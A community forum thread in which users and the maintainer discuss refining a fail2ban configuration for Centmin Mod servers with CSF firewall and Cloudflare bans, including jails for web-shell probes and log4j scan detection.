Welcome to Centmin Mod Community
Become a Member

Security fail2ban for Centmin Mod + CSF Firewall / Cloudflare API

Discussion in 'System Administration' started by eva2000, May 12, 2017.

  1. pamamolf

    pamamolf Premium Member Premium Member

    4,077
    427
    83
    May 31, 2014
    Ratings:
    +833
    Local Time:
    8:38 PM
    Nginx-1.25.x
    MariaDB 10.3.x
    Hi :)

    George please remove from:
    Code:
    [nginx-auth]
    the:
    as it is included and checked from:
    Code:
    [nginx-auth-main]
    Also this one is not duplicated:
    Code:
    [shells]
    enabled = true
    filter = shells
    action = csfdeny[name=shells]
    #action   = cloudflare
    logpath = /home/nginx/domains/*/log/access.log
              /var/log/nginx/*.access.log
    bantime = 604800
    maxretry = 1
    findtime = 86400
    Can you please duplicated so we will have the logs separated?


    Thank you !
     
  2. eva2000

    eva2000 Administrator Staff Member

    54,352
    12,198
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,763
    Local Time:
    4:38 AM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
    fixed :D
     
  3. pamamolf

    pamamolf Premium Member Premium Member

    4,077
    427
    83
    May 31, 2014
    Ratings:
    +833
    Local Time:
    8:38 PM
    Nginx-1.25.x
    MariaDB 10.3.x
    I just update it but [shells] is not duplicated :(

    It seems you forgot one fix :)
     
    Last edited: Sep 11, 2017
  4. pamamolf

    pamamolf Premium Member Premium Member

    4,077
    427
    83
    May 31, 2014
    Ratings:
    +833
    Local Time:
    8:38 PM
    Nginx-1.25.x
    MariaDB 10.3.x
    I will wait for that edit to do a proper test from start :)
     
  5. eva2000

    eva2000 Administrator Staff Member

    54,352
    12,198
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,763
    Local Time:
    4:38 AM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
    done :D
     
  6. pamamolf

    pamamolf Premium Member Premium Member

    4,077
    427
    83
    May 31, 2014
    Ratings:
    +833
    Local Time:
    8:38 PM
    Nginx-1.25.x
    MariaDB 10.3.x
    Now all are working great for me when i test it from scratch :)

    Don't know if it is possible to get at the Cloudflare ban as a comment the same as csf comment...

    For example Fail2ban and the jail name so we will know why the ip was banned (from the cloudflare panel) without going to the server and grep the ip or check it using the fail2ban status option.... ?
     
  7. eva2000

    eva2000 Administrator Staff Member

    54,352
    12,198
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,763
    Local Time:
    4:38 AM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
    i tried and couldn't get comments added but will look into it
     
  8. pamamolf

    pamamolf Premium Member Premium Member

    4,077
    427
    83
    May 31, 2014
    Ratings:
    +833
    Local Time:
    8:38 PM
    Nginx-1.25.x
    MariaDB 10.3.x
    Isn't ready to use the latest add for adminer detection?

    As i can see on github you comment it as preparation for it....
     
  9. eva2000

    eva2000 Administrator Staff Member

    54,352
    12,198
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,763
    Local Time:
    4:38 AM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
    yeah ain't ready yet, need to research for better fail2ban regex matching for adminer scan entries in logs
     
  10. Tinkerd10

    Tinkerd10 Member

    30
    3
    8
    Sep 28, 2016
    Ratings:
    +15
    Local Time:
    7:38 PM
    1.25.1
    10.11
    Hi

    I tested this last month on centos 7 and it worked perfectly it was like magic lol, and i was hoping if there is a version for centos 6 as i'am swarmed with bots to the point where i can't even use my own website.

    thank you
     
  11. eva2000

    eva2000 Administrator Staff Member

    54,352
    12,198
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,763
    Local Time:
    4:38 AM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
    Thanks for the feedback. CentOS 7 for now until it's perfected :D
     
  12. GamerJota

    GamerJota Member

    49
    7
    8
    Mar 1, 2016
    Ratings:
    +18
    Local Time:
    3:38 PM
    Anyone got a good example for XenForo 2 forum login and admin panel login limit?
     
    Last edited: Mar 11, 2018
  13. eva2000

    eva2000 Administrator Staff Member

    54,352
    12,198
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,763
    Local Time:
    4:38 AM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
  14. GamerJota

    GamerJota Member

    49
    7
    8
    Mar 1, 2016
    Ratings:
    +18
    Local Time:
    3:38 PM
    Oh my, just got confused out.

    Okay, sorted out the fail2ban and it's working, thank you.

    What about the virtual host "location" to catch the forums' login and register and also the login in the admin panel to add a limit_req_zone? Can't figure it out by myself. o_O
     
  15. eva2000

    eva2000 Administrator Staff Member

    54,352
    12,198
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,763
    Local Time:
    4:38 AM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
    that isn't part o fail2ban setup so start a new thread in subforum at Forum software usage.
     
  16. eva2000

    eva2000 Administrator Staff Member

    54,352
    12,198
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,763
    Local Time:
    4:38 AM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
  17. eva2000

    eva2000 Administrator Staff Member

    54,352
    12,198
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,763
    Local Time:
    4:38 AM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
    For folks testing my Centmin Mod fail2ban implementation, I've updated it to detect log4j vulnerability scans for Centmin Mod Nginx log inspection. Details in at Update to support log4j vulnerability scans · Issue #2 · centminmod/centminmod-fail2ban. You can see an example of fail2ban detecting log4j vulnerability scans on Centmin Mod Nginx server with my fail2ban implementation installed at GitHub - centminmod/centminmod-fail2ban: fail2ban setup for centminmod.com LEMP stack with CSF Firewall. FYI, while doing testing, it actually caught a real vulnerability scan too!

    There is no support for Centmin Mod fail2ban implementation, so you'd generally be on your own to configure and troubleshoot for your needs.